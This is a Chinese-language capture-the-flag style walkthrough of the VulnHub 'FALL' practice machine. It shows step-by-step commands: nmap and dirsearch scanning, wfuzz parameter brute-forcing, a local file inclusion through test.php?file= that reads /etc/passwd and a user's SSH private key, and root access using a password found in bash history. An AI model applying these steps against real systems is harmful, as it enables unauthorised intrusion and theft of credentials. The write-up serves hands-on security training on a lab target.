1.下载靶机，导入靶机

下载地址：https://download.vulnhub.com/digitalworld/FALL.7z

开启靶机。

2. 靶机、kali设置NAT网卡模式

3. kali扫描NAT网卡段的主机

kali主机

nmap扫描：nmap 192.168.92.1/24

判断出靶机ip是192.168.92.133。开启端口：22、80、139、443、445、3306、9090。

4. 访问开启的端口

80端口，页面是一些消息。

在多条消息记录中，多次发现Posted：qiu。猜测“qiu”可能是一个用户。

139端口被限制，无法访问

9090发现服务器登录框，但无数据登录

5. 扫描敏感目录

 dirsearch -u "http://192.168.92.133"

发现多个页面，/admin/login.php、/assets/、config.php、phpinfo.php、robots.txt、test.php。

6. 访问网页

/assets/，发现目录，但里面没有任何信息        /phpinfo.php、/config.php  页面无显示

/robots.txt  无敏感信息

/test.php页面，弹窗显示：缺少GET传参。说明这里存在注入。尝试寻找参数。

查看网页源代码发现没有。

7.爆破/test.php页面的参数

使用kali的wfuzz工具可以爆破，同时wfuzz自带字典。

在/usr/share/wfuzz/wordlist/general目录下存在多个字典，这里使用big.txt。

cat big.txt

爆破参数：

wfuzz -u "http://192.168.92.133/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

爆破出payload结果为：file

8. 利用file参数 查看文件/etc/passwd

http://192.168.92.133/test.php?file=/etc/passwd

发现 /bin/bash  可登录用户  只有root  和  qiu ，这里证明之前看到的qiu的确是用户。

9.  查看qiu的 ssh 密钥

http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa

10. 将ssh连接私钥的页面内容下载到kali

输入：curl http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa

11.利用用户qiu和ssh私钥进行连接靶机

查看文件权限：ls -l   发现id_rsa文件没有执行权限

远程连接：ssh -i id_rsa qiu@192.168.92.133

但这里warning说，私钥不能被其他人使用  

所以修改权限，只有其拥有者才有权限，其他人无权限。即600

修改私钥文件权限：chmod 600 id_rsa            【

【600：即 - rw- --- ---】【用户有：rw- ， 属组和其他人均无任何权限---】

再次连接：

ssh -i id_rsa qiu@192.168.92.133   连接成功

执行whoami命令，发现是qiu

12.查看历史命令，寻找其他敏感信息

cat .bash_history

竟然发现  sudo  强行提权的信息，存在可疑密码“remarkablyawesomE”

利用这个疑似密码，尝试提权

输入：su - root，密码：remarkablyawesomE

提权成功，执行whoami，得到是root用户。

FALL靶机练习结束！！！

温馨拓展：FALL 有 秋天 的意思哦！！！  金黄的树叶、赤红的枫叶，秋天的风景不错呦。

    这次靶机，开局很轻松，ip很容易扫描出来，但给的目录很多，解决方法或许也很多。但本人参考其他攻略，按这种方法练习下来。仅供参考。。。希望有所帮助。

                                                                                                    --------------------2025/3/27  21:41